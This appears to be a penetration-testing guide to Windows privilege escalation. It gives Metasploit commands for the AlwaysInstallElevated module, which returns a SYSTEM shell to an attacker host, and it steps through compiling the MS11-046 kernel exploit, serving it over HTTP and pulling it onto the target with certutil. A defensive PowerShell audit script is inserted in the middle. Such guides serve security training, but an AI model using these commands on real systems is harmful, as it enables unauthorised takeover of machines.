
Exploiting with Metasploit

  1. We discovered that the target is potentially vulnerable to the following kernel vulnerabilities:

    Note: exploit/windows/local/always_install_elevated enables privilege escalation by abusing the AlwaysInstallElevated policy on Windows systems.

  2. For this exploit, set the LHOST, LPORT, and SESSION fields.

    • SESSION should be the active Meterpreter session (e.g., 1).
    • LPORT must be different from the port used in the initial session (1338 in this case).

    use exploit/windows/local/always_install_elevated
    set SESSION 1
    set LHOST [IP-ADDRESS]
    set LPORT [PORT]
    run

  3. Run the exploit to obtain a SYSTEM shell.
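As an added example that is not part of the original page, the following PowerShell script audits whether the AlwaysInstallElevated policy abused by the Metasploit module above is actually effective on a host (it only works when the value is 1 in both the machine and the user hive) and can optionally clear it. The registry paths are Microsoft's documented policy locations; the -Remediate switch name is my own.

```powershell
# Audit (and optionally clear) the AlwaysInstallElevated installer policy.
# Assumption: run in an elevated PowerShell on the host being checked.
# The HKCU check only covers the user running the script; audit other
# profiles via Group Policy reporting or by loading their hives.
[CmdletBinding()]
param(
    [switch]$Remediate   # hypothetical switch name chosen for this example
)

$keys = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Get-AlwaysInstallElevatedState {
    # Returns a hashtable of key path -> DWORD value (or $null when unset).
    $state = @{}
    foreach ($key in $keys) {
        $value = $null
        if (Test-Path $key) {
            $value = (Get-ItemProperty -Path $key -Name 'AlwaysInstallElevated' `
                      -ErrorAction SilentlyContinue).AlwaysInstallElevated
        }
        $state[$key] = $value
    }
    return $state
}

$state = Get-AlwaysInstallElevatedState
foreach ($entry in $state.GetEnumerator()) {
    $shown = if ($null -eq $entry.Value) { 'not set' } else { $entry.Value }
    Write-Output ("{0}\AlwaysInstallElevated = {1}" -f $entry.Key, $shown)
}

# The policy is only effective when BOTH hives carry the value 1.
$enabledCount = @($state.Values | Where-Object { $_ -eq 1 }).Count
if ($enabledCount -eq $keys.Count) {
    Write-Warning 'AlwaysInstallElevated is effective: MSI packages install with SYSTEM rights for any user.'
    if ($Remediate) {
        foreach ($key in $keys) {
            Set-ItemProperty -Path $key -Name 'AlwaysInstallElevated' -Value 0 -Type DWord
        }
        Write-Output 'Value set to 0 in both hives; confirm Group Policy does not re-apply it at next refresh.'
    }
} else {
    Write-Output 'AlwaysInstallElevated is not effective on this host.'
}
```

Run it as part of a baseline check; the expected state on a hardened host is "not set" or 0 in both hives.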

Exploiting with Windows Exploit Suggester

  1. Using Windows Exploit Suggester, we identified that the target is potentially vulnerable to several kernel exploits:
    python3 wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only

  2. Download and compile an exploit using searchsploit:

    searchsploit 40564
    searchsploit -m windows_x86/local/40564.c
    x86_64-w64-mingw32-gcc 40564.c -o ms11-046.exe -lws2_32
    

  3. Alternatively, search for a pre-compiled version of the exploit.

    Note: Be cautious with pre-compiled executables as they may contain backdoors. Always use trusted sources.

  4. Example: MS11-046 pre-compiled exploit.

  5. To download, click the Raw link for the executable.

  6. Transfer the exploit to the target machine (see File Transfer section for techniques). Example using a Python HTTP server:

    python3 -m http.server 8000
    

  7. Fetch the exploit on the target, execute it, and confirm successful privilege escalation. Example fetching it with certutil:

    certutil -urlcache -f http://[IP-ADDRESS]:8000/ms11-046.exe ms11-046.exe